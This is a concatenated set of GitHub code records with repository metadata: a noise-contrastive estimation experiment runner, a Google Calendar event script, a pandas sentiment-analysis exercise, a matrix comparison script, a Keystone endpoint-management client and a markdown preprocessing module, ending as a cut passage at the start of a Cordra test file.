\"gaussian\":\n data_cov = torch.Tensor(np.cov(obs.data.numpy(), rowvar=False)).float()\n if kwargs['n_comp'] == 1:\n data_cov = data_cov * torch.eye(kwargs['n_comp']) # use 2-dim tensor instead of 0-dim\n noise_marginal = MultivariateNormal(loc=torch.zeros(kwargs['n_comp']),\n covariance_matrix=data_cov)\n del data_cov # not used afterwards\n elif kwargs['noise_type'] == \"likedata\":\n noise_marginal, _ = get_model(n_comp=kwargs['n_comp'], n_samples=1,\n seed=kwargs['seed_data_gen'], data_val=kwargs['data_val'])\n for param in noise_marginal.parameters():\n param.data = param.data * 0. 
+ kwargs['noise_val']\n elif kwargs['noise_type'] == \"flexible\":\n noise_marginal = Histogram(n_bins=kwargs['noise_bins'], n_comp=kwargs['n_comp'])\n elif str(kwargs['noise_type'])[-3:] == \".th\": # a filename is entered\n temp = torch.load(kwargs['noise_type'])\n noise_marginal = Histogram(n_bins=temp['n_bins'], n_comp=temp['n_comp'])\n noise_marginal.load_state_dict(temp['noise_marginal_statedict'])\n\n # Formatting data (train/test datasets, dataloaders)\n metrics.train.experiment['n_samples'] = kwargs['n_samples']\n metrics.test.experiment['n_samples'] = N_SAMPLES_TEST\n metrics.train.experiment['n_samples_data'] = n_samples_data\n metrics.test.experiment['n_samples_data'] = n_samples_data_test\n\n # Estimation method (e.g. SingleMLE)\n model = Model(\n n_comp=kwargs['n_comp'],\n data_marginal_truth=data_marginal_truth,\n data_marginal=data_marginal,\n noise_marginal=noise_marginal,\n noise_to_data=kwargs['noise_to_data']\n )\n if kwargs['verbose']:\n print(model)\n\n # # Visualize estimated sources before training\n # if kwargs['with_plot']:\n # source_init = data_marginal.embedder(obs)\n # visualize_timeseries(source_init, figpath=kwargs['out'] / \"source_init_timeseries.pdf\")\n # visualize_distribution(source_init, figpath=kwargs['out'] / \"source_init_distribution.pdf\")\n # plt.close(\"all\")\n\n # Freeze parameters you do not want to train\n freeze(data_marginal_truth)\n if not kwargs['train_data']:\n freeze(data_marginal)\n if not kwargs['train_noise']:\n freeze(noise_marginal)\n # add gaussian noise to the data approximation we will optimize,\n # given it is initialized with the truth\n if kwargs['perturb_init']:\n perturb_init_inplace(list(data_marginal.parameters()), seed=kwargs['seed_data_gen'])\n\n trainable_params_names = [\n name for (name, param) in model.named_parameters() if param.requires_grad\n ]\n trainable_params_sel = [\n param.requires_grad for (_, param) in model.named_parameters()\n ]\n trainable_params_init_numpy = [\n param.data.numpy() for (sel, param) in zip(trainable_params_sel, model.parameters())\n if sel\n ]\n if kwargs['verbose']:\n print(\"Optimized parameters: \", trainable_params_names)\n\n if not kwargs['predict_mse']:\n\n if kwargs['cost'] == 'default':\n\n dataset_train = make_dataset(\n obs, noise_to_data=kwargs['noise_to_data'],\n noise_marginal=noise_marginal, seed=kwargs['seed_dataset'])\n dataset_test = make_dataset(\n obs_test, noise_to_data=kwargs['noise_to_data'],\n noise_marginal=noise_marginal, seed=kwargs['seed_dataset'] + 1)\n\n dataloaded_train = DataLoader(\n dataset_train, batch_size=kwargs['batch_size'], # len(dataset_train)\n shuffle=True) # , num_workers=0)\n dataloaded_test = DataLoader(\n dataset_test, batch_size=kwargs['batch_size'],\n shuffle=False)\n\n # Estimate Pretext Task difficulty\n if supervised:\n if kwargs['verbose']:\n print(\"Pretext Task : Random Forest... 
\\n\")\n acc_train, acc_test = get_classif_upperbound(\n dataset_train, dataset_test, max_depth=10, metrics=metrics, verbose=kwargs['verbose']\n )\n\n # Optimizer\n callback = partial(\n callback_extended,\n model=model,\n dataloaded_train=dataloaded_train,\n dataloaded_test=dataloaded_test,\n run_epoch=run_epoch,\n eval_downstream=eval_downstream,\n metrics=metrics,\n downstream_obs=obs_test,\n downstream_source=source_test,\n mixing_net=data_marginal.generator_true\n )\n\n def compute_cost(torch_vars):\n '''This is based on autoptim v.2., based on pytorch's autograd.'''\n _, names = extract_weights(model, requires_grad_only=True)\n delete_weights(model, requires_grad_only=True)\n load_weights(model, names, torch_vars)\n model.zero_grad()\n\n loss_train = run_epoch(\n model,\n dataloaded_train,\n optimizer=None,\n train=True,\n evaluat=False,\n metrics=metrics,\n )\n\n return loss_train\n\n objective_function = compute_cost\n\n elif kwargs['cost'] == 'asympmse':\n\n def compute_asympmse(torch_vars):\n '''This is based on autoptim v.2., based on pytorch's autograd.'''\n _, names = extract_weights(model, requires_grad_only=True)\n delete_weights(model, requires_grad_only=True)\n load_weights(model, names, torch_vars)\n model.zero_grad()\n\n # forward pass\n start = time.time()\n loss_train = model.predict_mse(x=obs, n_samples=kwargs['n_samples'], verbose=kwargs['verbose'])\n end = time.time()\n duration = np.round(end - start, 2)\n if kwargs['verbose']:\n print(f\"Forward pass takes {duration} seconds\")\n\n return loss_train\n\n objective_function = compute_asympmse\n\n callback = None\n\n # import ipdb; ipdb.set_trace()\n # select only non-frozen parameters\n solution, _ = minimize(\n objective_function=objective_function,\n optim_vars=trainable_params_init_numpy,\n method='CG',\n callback=callback,\n tol=1e-20,\n options={\"maxiter\": kwargs['n_epochs'], \"disp\": kwargs['verbose']}\n )\n assert solution # same as available params?\n\n # # Visualize estimated sources post training\n # if kwargs['with_plot']:\n # source_estim = data_marginal.embedder(obs)\n # visualize_timeseries(source_estim, figpath=kwargs['out'] / \"source_final_timeseries.pdf\")\n # visualize_distribution(source_estim, figpath=kwargs['out'] / \"source_final_distribution.pdf\")\n # plt.close(\"all\")\n\n # Save parameters of interest\n metrics.test.data_marginal_params = [param.data for param in data_marginal.parameters()]\n metrics.test.data_marginal_truth_params = [param.data for param in data_marginal_truth.parameters()]\n\n metrics.test.data_marginal_truth_statedict = data_marginal_truth.state_dict()\n metrics.test.data_marginal_statedict = data_marginal.state_dict()\n metrics.test.noise_marginal_statedict = noise_marginal.state_dict()\n\n else:\n # Compute predicted mse\n mse = model.predict_mse(\n x=obs, n_samples=kwargs['n_samples'],\n # important : keep this one args.n_samples and not n_samples\n verbose=kwargs['verbose']\n )\n metrics.mse_predicted = mse\n\n # if kwargs['with_plot']:\n # plot_kpis(metrics, figpath=kwargs['out'] / \"kpis.pdf\")\n\n return metrics\n\n\n# Wrap your experiment in one function\n@mem.cache # cache to avoid losing computations (checkpointing)\ndef run_mse_empirical(\n estimation=\"singlence\", generation=\"gaussian_var\",\n n_comp=1, n_samples=1000,\n noise_type=\"likedata\",\n prop_noise=0.5, noise_val=0.5,\n data_val=\"default\",\n seed=0, verbose=False,\n perturb_init=False,\n out=DEFAULTS['out']\n):\n t0 = time.time()\n # renaming variables\n noise_to_data = prop_noise / (1 - 
prop_noise)\n\n # get default arguments\n kwargs = DEFAULTS.copy()\n\n # overwrite with specified arguments\n kwargs.update({\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_comp\": n_comp,\n \"n_samples\": n_samples,\n \"prop_noise\": prop_noise,\n \"noise_type\": noise_type,\n \"noise_val\": noise_val,\n \"seed_data_gen\": seed,\n \"seed_dataset\": seed,\n \"verbose\": verbose,\n \"noise_to_data\": noise_to_data,\n \"out\": out,\n \"data_val\": data_val,\n \"perturb_init\": perturb_init,\n #\n \"train_data\": True,\n \"experiment\": \"mse_empirical\",\n \"hue\": str(n_samples),\n \"predict_mse\": False\n })\n\n # Rename output directory\n name = get_name_from_dict(kwargs)\n kwargs['out'] = kwargs['out'] / kwargs['experiment'] / kwargs['estimation'] / kwargs['hue'] / name\n\n # Run estimation\n metrics = run_model(**kwargs)\n\n # Collect and format results: flatten and concatenate the parameters into one big vector\n params_estim = torch.cat([param.flatten() for param in metrics.test.data_marginal_params])\n params_true = torch.cat([param.flatten() for param in metrics.test.data_marginal_truth_params])\n\n # Compute squared error\n se = torch.pow(params_estim - params_true, 2).mean().item()\n\n # return a dict to get a DataFrame down the road\n output = {\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_samples\": n_samples,\n \"prop_noise\": prop_noise,\n \"data_val\": data_val,\n \"noise_val\": noise_val,\n \"seed\": seed,\n \"params_estim\": params_estim,\n \"params_true\": params_true,\n \"se\": se,\n \"noise_type\": noise_type,\n \"computation_time\": time.time() - t0\n }\n\n return output # return a dict to get a DataFrame down the road\n\n\n# Wrap your experiment in one function\n@mem.cache # cache to avoid losing computations (checkpointing)\ndef run_mse_montecarlo(\n estimation=\"singlence\", generation=\"gaussian_var\",\n n_comp=1, n_samples=1000,\n prop_noise=0.5, noise_val=0.5,\n noise_type=\"likedata\",\n data_val=\"default\",\n seed=0, verbose=False,\n perturb_init=False,\n out=DEFAULTS['out'],\n n_samples_data_montecarlo=10000\n):\n t0 = time.time()\n # renaming variables\n noise_to_data = prop_noise / (1 - prop_noise)\n\n # get default arguments\n kwargs = DEFAULTS.copy()\n\n # overwrite with specified arguments\n kwargs.update({\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_comp\": n_comp,\n \"n_samples\": n_samples,\n \"prop_noise\": prop_noise,\n \"data_val\": data_val,\n \"noise_type\": noise_type,\n \"noise_val\": noise_val,\n \"seed_data_gen\": seed,\n \"seed_dataset\": seed,\n \"verbose\": verbose,\n \"noise_to_data\": noise_to_data,\n \"out\": out,\n \"perturb_init\": perturb_init,\n \"n_samples_data_montecarlo\": n_samples_data_montecarlo,\n #\n \"train_data\": True,\n \"experiment\": \"mse_prediction\",\n \"hue\": str(n_samples),\n \"predict_mse\": True\n })\n\n # Rename output directory\n name = get_name_from_dict(kwargs)\n kwargs['out'] = kwargs['out'] / kwargs['experiment'] / kwargs['estimation'] / kwargs['hue'] / name\n\n # Run estimation\n metrics = run_model(**kwargs)\n\n # Collect results\n mse = metrics.mse_predicted\n\n # return a dict to get a DataFrame down the road\n output = {\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_samples\": n_samples,\n \"n_samples_data_montecarlo\": n_samples_data_montecarlo,\n \"prop_noise\": prop_noise,\n \"noise_val\": noise_val,\n \"data_val\": data_val,\n \"seed\": seed,\n \"mse_pred\": mse.item(),\n \"noise_type\": noise_type,\n 
\"computation_time\": time.time() - t0\n }\n\n return output\n\n\n# Wrap your experiment in one function\n@mem.cache # cache to avoid losing computations (checkpointing)\ndef run_mse_quadrature(\n generation='gaussian_var', prop_noise=0.5,\n data_val=1., noise_val=0, n_samples=400, estimation='singlence', noise_type='data',\n):\n if generation == \"gaussian_var\":\n from nlica.quadrature.singleparam.gaussian_var import get_mse_quadrature\n elif generation == \"gaussian_mean\":\n from nlica.quadrature.singleparam.gaussian_mean import get_mse_quadrature\n elif generation == \"gaussian_corr\":\n from nlica.quadrature.singleparam.gaussian_corr import get_mse_quadrature\n mse = get_mse_quadrature(\n estimation=estimation,\n n_samples=n_samples,\n prop_noise=prop_noise,\n param_data=data_val,\n param_noise=noise_val,\n noise_type=noise_type\n )\n results = {\n \"mse\": mse,\n \"generation\": generation,\n \"prop_noise\": prop_noise,\n \"data_val\": data_val, \"noise_val\": noise_val,\n \"n_samples\": n_samples,\n \"estimation\": estimation,\n \"noise_type\": noise_type\n }\n\n return results\n\n\n# Wrap your experiment in one function\n@mem.cache # cache to avoid losing computations (checkpointing)\ndef run_optimal_noise(\n estimation=\"singlence\", generation=\"gaussian_var\",\n n_comp=1, n_samples=10000,\n n_samples_data_montecarlo=10000,\n prop_noise=0.5,\n data_val=\"default\",\n seed=0, verbose=True, noise_bins=20,\n out=DEFAULTS['out'], n_epochs=100,\n):\n t0 = time.time()\n # renaming variables\n noise_to_data = prop_noise / (1 - prop_noise)\n\n # get default arguments\n kwargs = DEFAULTS.copy()\n\n # overwrite with specified arguments\n kwargs.update({\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_comp\": n_comp,\n \"n_samples\": n_samples,\n \"n_samples_data_montecarlo\": n_samples_data_montecarlo,\n \"prop_noise\": prop_noise,\n \"seed_data_gen\": seed,\n \"seed_dataset\": seed,\n \"verbose\": verbose,\n \"noise_to_data\": noise_to_data,\n \"noise_bins\": noise_bins,\n \"out\": out,\n \"data_val\": data_val,\n \"n_epochs\": n_epochs,\n #\n \"train_noise\": True,\n \"perturb_init\": False,\n \"noise_type\": \"flexible\",\n \"experiment\": \"optimalnoise\",\n \"hue\": generation,\n \"cost\": \"asympmse\"\n })\n\n # Rename output directory\n name = get_name_from_dict(kwargs)\n kwargs['out'] = kwargs['out'] / kwargs['experiment'] / kwargs['estimation'] / kwargs['hue'] / name\n\n # Run estimation\n metrics = run_model(**kwargs)\n\n # return a dict to get a DataFrame down the road\n output = {\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_samples\": n_samples,\n \"n_samples_data_montecarlo\": n_samples_data_montecarlo,\n \"prop_noise\": prop_noise,\n \"data_val\": data_val,\n \"seed\": seed,\n \"n_comp\": n_comp,\n \"n_bins\": noise_bins,\n \"data_marginal_statedict\": metrics.test.data_marginal_statedict,\n \"data_marginal_truth_statedict\": metrics.test.data_marginal_truth_statedict,\n \"noise_marginal_statedict\": metrics.test.noise_marginal_statedict,\n \"computation_time\": time.time() - t0\n }\n\n return output\n","repo_name":"l-omar-chehab/nce-noise-var","sub_path":"nlica/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":20223,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"41"} +{"seq_id":"11821469668","text":"\"\"\"\nAdd event to Google Calendar\n\"\"\"\nimport datetime\n\nimport httplib2\nfrom googleapiclient.discovery import build, Resource\nfrom googleapiclient.http import 
BatchHttpRequest\nfrom httplib2 import Http\nfrom oauth2client import tools\nfrom oauth2client.client import OAuth2WebServerFlow\nfrom oauth2client.file import Storage\n\ngoogle_client_id = ''\ngoogle_client_secret = ''\ngoogle_calendar_id = ''\n\n\ndef build_events():\n today = datetime.datetime.now().replace(second=0)\n events = list()\n\n events.append({\n 'summary': 'Test Event',\n 'start': {\n 'dateTime': today.replace(hour=9, minute=30).strftime('%Y-%m-%dT%H:%M:%S'),\n 'timeZone': 'Asia/Tokyo'\n },\n 'end': {\n 'dateTime': today.replace(hour=13, minute=00).strftime('%Y-%m-%dT%H:%M:%S'),\n 'timeZone': 'Asia/Tokyo'\n }\n })\n\n return events\n\n\ndef main():\n scope = 'https://www.googleapis.com/auth/calendar'\n flow = OAuth2WebServerFlow(google_client_id, google_client_secret, scope)\n\n storage = Storage('credentials.dat')\n\n credentials = storage.get()\n\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage, tools.argparser.parse_args())\n\n http: Http = httplib2.Http()\n http: Http = credentials.authorize(http)\n\n service: Resource = build('calendar', 'v3', http=http)\n\n batch: BatchHttpRequest = service.new_batch_http_request()\n\n for event in build_events():\n batch.add(service.events().insert(calendarId=google_calendar_id, body=event))\n\n batch.execute(http=http)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mark5cinco/lazy-scripts","sub_path":"google/google_calendar/log_day.py","file_name":"log_day.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"21889636458","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 3 10:55:54 2023\r\n\r\n@author: sumike\r\n\"\"\"\r\n\r\nimport pandas as pd \r\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\r\n\r\n#reading excel files\r\ndata = pd.read_excel(\"articles.xlsx\")\r\n\r\n#summary of the data\r\ndata.describe()\r\n\r\n#summary of columns\r\ndata.info()\r\n\r\n#countin the number of articles per source\r\n# group by syntax: df.groupby([column to group])[column to count].count()\r\n\r\ndata.groupby(['source_id'])['article_id'].count()\r\n\r\n# number of reactions by publisher\r\ndata.groupby(['source_id'])['engagement_reaction_count'].sum() \r\n\r\n#dropping a column\r\ndata = data.drop('engagement_comment_plugin_count' , axis=1)\r\n\r\n#Functions in python\r\n\r\ndef thisFunction():\r\n print('This is my first fucntion')\r\n \r\nthisFunction()\r\n\r\n#This is a function with variables\r\ndef aboutMe(name,surname, location):\r\n print('this is ' +name+\" \"+surname+\". 
\"+\"My location is \"+location)\r\n return name,surname,location\r\n \r\ninfo = aboutMe(\"Sumi\",\"Johnes\",\"USA\")\r\n\r\n#using for loops in functions\r\n\r\ndef favFood(food):\r\n for x in food:\r\n print(\"top food is \"+x)\r\n \r\nfastfood = ['burgers','pizza','noodles']\r\nfavFood(fastfood)\r\n\r\n#creating a keyword flag \r\n\r\n''' keyword = 'crash'\r\nlength = len(data)\r\nkeyword_flag = []\r\nfor x in range(0,length):\r\n heading = data['title'][x]\r\n if keyword in heading:\r\n flag = 1\r\n else:\r\n flag = 0\r\n \r\n keyword_flag.append(flag)\r\nprint(keyword_flag) '''\r\n \r\n#creating a function\r\n\r\ndef keyWordFlag(keyword):\r\n length = len(data)\r\n keyword_flag = []\r\n for x in range(0,length):\r\n heading = data['title'][x]\r\n try:\r\n if keyword in heading:\r\n flag = 1\r\n else:\r\n flag = 0\r\n except:\r\n flag = 0\r\n \r\n keyword_flag.append(flag)\r\n return keyword_flag\r\n \r\n \r\nkeyWordFlag = keyWordFlag('murder')\r\n#print(keyWordFlag) \r\n\r\n#creating new column\r\ndata['KeyWordFlag'] = pd.Series(keyWordFlag) \r\n\r\n# SentimentIntensityAnalyzer\r\n\r\nsentiment_int = SentimentIntensityAnalyzer()\r\ntext = data['title'][16]\r\nsentiment = sentiment_int.polarity_scores(text)\r\n\r\nneg = sentiment['neg']\r\npos = sentiment['pos']\r\nneu = sentiment['neu']\r\n\r\n#looping through\r\n\r\nneg_sentiment_title = []\r\npos_sentiment_title = []\r\nneu_sentiment_title = []\r\n\r\nlength = len(data)\r\nsentiment_int = SentimentIntensityAnalyzer()\r\nfor x in range(0,length):\r\n try:\r\n text = data['title'][x]\r\n sentiment = sentiment_int.polarity_scores(text)\r\n neg = sentiment['neg']\r\n pos = sentiment['pos']\r\n neu = sentiment['neu']\r\n except:\r\n neg = 0\r\n pos = 0\r\n neu = 0\r\n neg_sentiment_title.append(neg)\r\n pos_sentiment_title.append(pos)\r\n neu_sentiment_title.append(neu)\r\n\r\n# converting to series creatine new columns\r\n\r\ndata['neg_sentiment_title'] = pd.Series(neg_sentiment_title)\r\ndata['pos_sentiment_title'] = pd.Series(pos_sentiment_title)\r\ndata['neu_sentiment_title'] = pd.Series(neu_sentiment_title)\r\n\r\n\r\ndata.to_excel(\"blogme_clean.xlsx\",sheet_name=\"blogmedata\", index = False)\r\n\r\n\r\n \r\n\r\n\r\n\r\n","repo_name":"sumijohnes/PyhtonandTableu","sub_path":"blogme.py","file_name":"blogme.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"13855160696","text":"try:\n import json\nexcept ImportError:\n import simplejson as json\n\nfrom horizon_hpe_storage.api.common import exceptions\nfrom horizon_hpe_storage.api.common import http\n\n\nclass HTTPJSONRESTClient(http.HTTPJSONRESTClient):\n \"\"\"\n HTTP/REST client to access keystone service\n \"\"\"\n\n def initClient(self, token, tenant_id):\n # use the unscoped token from the Horizon session to get a\n # real admin token that we can use to access Keystone and Barbican\n self.token_id = None\n self.auth_try = 0\n try:\n info = {\n 'auth': {\n 'tenantId': tenant_id,\n 'token': {\n 'id': token\n }\n }\n }\n\n resp, body = self.post('/v2.0/tokens', body=info)\n if body and 'access' in body:\n access = body['access']\n if 'token' in access:\n newToken = access['token']\n self.token_id = newToken['id']\n self.tenant_id = tenant_id\n except Exception as ex:\n exceptions.handle(self.request,\n ('Unable to get Keystone token.'))\n\n def getTokenId(self):\n return self.token_id\n\n def getTenantId(self):\n return self.tenant_id\n\n def getSSMCEndpointForHost(self, 
host):\n try:\n # first get service id\n header = {'X-Auth-Token': self.token_id}\n\n resp, body = self.get(\n '/v3/services?name=ssmc-' + host,\n headers=header)\n\n if body and 'services' in body:\n services = body['services']\n service = services[0]\n if service and 'id' in service:\n service_id = service['id']\n\n # now get endpoint for this service\n if service_id:\n resp, body = self.get('/v3/endpoints?service_id=' +\n service_id, headers=header)\n if body and 'endpoints' in body:\n endpoints = body['endpoints']\n endpoint = endpoints[0]\n return endpoint['url']\n\n return None\n except Exception as ex:\n exceptions.handle(self.request,\n ('Unable to get SSMC Endpoint for host.'))\n\n def getSSMCEndpointForServiceName(self, service_name):\n # first get service id\n header = {'X-Auth-Token': self.token_id}\n\n resp, body = self.get(\n '/v3/services?name=ssmc-3parfc',\n headers=header)\n if body and 'services' in body:\n services = body['services']\n service = services[0]\n if service and 'id' in service:\n service_id = service['id']\n\n # now get endpoint for this service\n if service_id:\n resp, body = self.get(\n '/v3/endpoints?service_id=' +\n service_id, headers=header)\n if body and 'endpoints' in body:\n endpoints = body['endpoints']\n endpoint = endpoints[0]\n return endpoint['url'], service_id\n\n return None\n\n def getSSMCEndpointForServiceId(self, service_id):\n # first get service id\n header = {'X-Auth-Token': self.token_id}\n\n url = '/v3/services/' + service_id\n resp, body = self.get(url, headers=header)\n if body and 'service' in body:\n service = body['service']\n if service and 'id' in service:\n service_id = service['id']\n service_name = service['name']\n\n # now get endpoint for this service\n if service_id:\n resp, body = self.get('/v3/endpoints?service_id=' +\n service_id, headers=header)\n if body and 'endpoints' in body:\n endpoints = body['endpoints']\n if endpoints:\n endpoint = endpoints[0]\n return endpoint, service_name\n\n return None\n\n def getSSMCServiceName(self, service_id):\n header = {'X-Auth-Token': self.token_id}\n\n url = '/v3/services/' + service_id\n resp, body = self.get(url, headers=header)\n if body and 'service' in body:\n service = body['service']\n if service and 'name' in service:\n service_name = service['name']\n return service_name\n return None\n\n def getSSMCEndpoints(self):\n endpoints = []\n # get all 3par-link services\n self.auth_try = 1\n header = {'X-Auth-Token': self.token_id}\n try:\n resp, body = self.get(\n '/v3/services?type=3par-link',\n headers=header)\n if body and 'services' in body:\n services = body['services']\n # get endpoint for each service\n for service in services:\n if service and 'id' in service:\n id = service['id']\n endpt, name = self.getSSMCEndpointForServiceId(id)\n if endpt:\n endpointData = {}\n endpointData['id'] = service['id']\n backend = name[5:] # remove 'ssmc-' prefix\n endpointData['backend'] = backend\n endpointData['endpoint'] = endpt['url']\n endpoints.append(endpointData)\n\n return endpoints\n except Exception as ex:\n exceptions.handle(self.request,\n ('Unable to get SSMC Endpoints.'))\n\n def addSSMCEndpoint(self, service_name, endpoint):\n # first add service\n header = {'X-Auth-Token': self.token_id}\n info = {\n 'service': {\n 'type': '3par-link',\n 'name': service_name,\n 'description': 'link to SSMC instance'\n }\n }\n resp, body = self.post('/v3/services', headers=header, body=info)\n\n # now add endpoint for service\n if body and 'service' in body:\n service = body['service']\n 
if service and 'id' in service:\n service_id = service['id']\n if service_id:\n info = {\n 'endpoint': {\n 'interface': 'admin',\n 'region': 'RegionOne',\n 'url': endpoint,\n 'service_id': service_id\n }\n }\n resp, body = self.post(\n '/v3/endpoints',\n headers=header,\n body=info)\n\n def updateSSMCEndpointUrl(self, service_id, url):\n # first need to get endpoint id\n endpt, service_name = self.getSSMCEndpointForServiceId(service_id)\n endpt_id = endpt['id']\n header = {'X-Auth-Token': self.token_id}\n # update endpoint for service\n try:\n info = {\n 'endpoint': {\n 'interface': 'admin',\n 'region': 'RegionOne',\n 'url': url,\n 'service_id': service_id\n }\n }\n resp, body = self.patch(\n '/v3/endpoints/' + endpt_id,\n headers=header,\n body=info)\n except Exception as ex:\n exceptions.handle(self.request,\n ('Unable to update SSMC Endpoint URL.'))\n\n def deleteSSMCEndpoint(self, service_id):\n header = {'X-Auth-Token': self.token_id}\n try:\n # first delete endpoint for the service\n endpt, service_name = self.getSSMCEndpointForServiceId(service_id)\n resp = self.delete('/v3/endpoints/' + endpt['id'], headers=header)\n\n # now delete the service\n resp = self.delete('/v3/services/' + service_id, headers=header)\n except Exception as ex:\n exceptions.handle(self.request,\n 'Unable to delete SSMC Endpoint.')\n","repo_name":"hpe-storage/horizon-hpe-storage-ui","sub_path":"horizon_hpe_storage/api/keystoneClient/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":8267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"23792886871","text":"from scipy.stats import mannwhitneyu\nimport pandas as pd\nimport numpy as np\nimport os\n\nroot = \"/Users/6j9/projects/mouse/deseq/matrix\"\npath_a = os.path.join(root, \"upenn_mouse_lfc_pairwise_matrix_inf-1.30_padj-0.01.tsv\")\npath_b = os.path.join(root, \"upenn_mouse_lfc_pairwise_matrix_inf-1.30_padj-0.01_ikbkb-neg.tsv\")\n\ndef compare_matrices(b, a):\n a, b = a.values.flatten(), b.values.flatten()\n print(mannwhitneyu(a, b, alternative='two-sided'))\n return\n u, p = mannwhitneyu(a, b)\n effect_size = u / (len(a) * len(b))\n print(f\"common language effect size: {effect_size}, overlap p-statistic: {p}\")\n\nmat_a = pd.read_csv(path_a, sep=\"\\t\", index_col=0)\nmat_b = pd.read_csv(path_b, sep=\"\\t\", index_col=0)\n\ntest = compare_matrices(mat_a, mat_b)\n","repo_name":"jeanmerlet/stm_mouse_skin_ikkb","sub_path":"deseq/compare_two_matrices.py","file_name":"compare_two_matrices.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"43283620807","text":"import re\nimport json\n\nimport pandas as pd\nfrom pandas import DataFrame\nfrom bs4 import BeautifulSoup\nfrom markdown import markdown\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\nimport nltk\n\nnltk.download(\"wordnet\")\nnltk.download(\"omw-1.4\")\nnltk.download('stopwords')\n\nstemmer = WordNetLemmatizer()\nstop_words = set(stopwords.words('english'))\n\n\ndef kaggle_cleaning(document, min_len=4):\n document = re.sub(r\"_\", \" \", document)\n document = re.sub(r\"\\W\", \" \", document)\n document = re.sub(r\"\\s+[a-zA-Z]\\s+\", \" \", document)\n document = re.sub(r\"\\^[a-zA-Z]\\s+\", \" \", document)\n document = re.sub(r\"\\s+\", \" \", document)\n document = re.sub(r\"^b\\s+\", \" \", document)\n document = re.sub(r\"\\s+[a-zA-Z]\\s+\", \" \", document)\n\n document = 
document.strip().lower()\n tokens = document.split()\n tokens = [stemmer.lemmatize(token) for token in tokens]\n tokens = [\n token\n for token in tokens\n if len(token) >= min_len and token not in stop_words\n ]\n return \" \".join(tokens)\n\n\ndef clean_text(document):\n # Remove all the special characters\n document = re.sub(r\"\\W\", \" \", str(document))\n # remove all single characters\n document = re.sub(r\"\\s+[a-zA-Z]\\s+\", \" \", document)\n # Remove single characters from the start\n document = re.sub(r\"\\^[a-zA-Z]\\s+\", \" \", document)\n # Substituting multiple spaces with single space\n document = re.sub(r\"\\s+\", \" \", document, flags=re.I)\n # Removing prefixed 'b'\n document = re.sub(r\"^b\\s+\", \"\", document)\n # Converting to Lowercase\n document = document.lower()\n return document\n\n\nclass MdProcessor:\n def __init__(self):\n self.features = {\n \"text\": lambda s: clean_text(\"\".join(s.findAll(text=True))),\n \"headers\": self.rule2text(re.compile(\"^h[1-6]$\")),\n \"bold_text\": self.rule2text(\"strong\"),\n \"italic_text\": self.rule2text(\"i\"),\n \"code\": self.rule2text(\"code\"),\n \"links_labels\": self.rule2text(\"a\"),\n \"image_labels\": self.get_image_labels,\n \"links\": self.get_links,\n }\n\n @staticmethod\n def rule2text(search_fun):\n return lambda s: [i.text for i in s.find_all(search_fun)]\n\n @staticmethod\n def get_image_labels(s):\n return [i['alt'] for i in s.find_all('img', alt=True)]\n\n @staticmethod\n def get_links(s):\n return [\n i['href'] if i.name == 'a' else i['src']\n for i in s.find_all('a') + s.find_all('img')\n ]\n\n def process(self, md_string):\n soup = BeautifulSoup(markdown(md_string), \"html.parser\")\n res = {}\n for name, fun in self.features.items():\n res[name] = fun(soup)\n\n return json.dumps(res)\n\n\ndef preprocess_dataframe(df: DataFrame) -> DataFrame:\n md_processor = MdProcessor()\n md_mask = df[\"cell_type\"] == \"markdown\"\n\n df[\"processed_source\"] = None\n df.loc[md_mask, \"processed_source\"] = df[md_mask].source.apply(\n lambda row: md_processor.process(row)\n )\n\n return df\n\n\nclass DatasetProcessor:\n def __init__(self, path):\n self.df = pd.read_feather(path)\n self.mapping = {\"markdown\": MdProcessor}\n\n @property\n def dataset(self):\n return self.df\n\n def process_dataset(self):\n for cell_type, processor in self.mapping:\n md_mask = self.df[\"cell_type\"] == cell_type\n self.df[\"processed_source\"] = None\n self.df.loc[md_mask, \"processed_source\"] = self.df[md_mask].source.apply(\n lambda row: processor.process(row)\n )\n\n\nif __name__ == '__main__':\n prc = MdProcessor()\n md = '![CNN Architecture](https://upload.wikimedia.org/wikipedia/commons/6/63/Typical_cnn.png)'\n md += '\\nMy favorite search engine is [Duck Duck Go](https://duckduckgo.com).'\n print(prc.process(md))\n","repo_name":"JetBrains-Research/AI4Code-kaggle","sub_path":"data_managment/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"37697236022","text":"\"\"\"Check the CordraClient Class and its functionality. Should be able to fully reproduce the \nfunctionality of the Cordra REST API. 
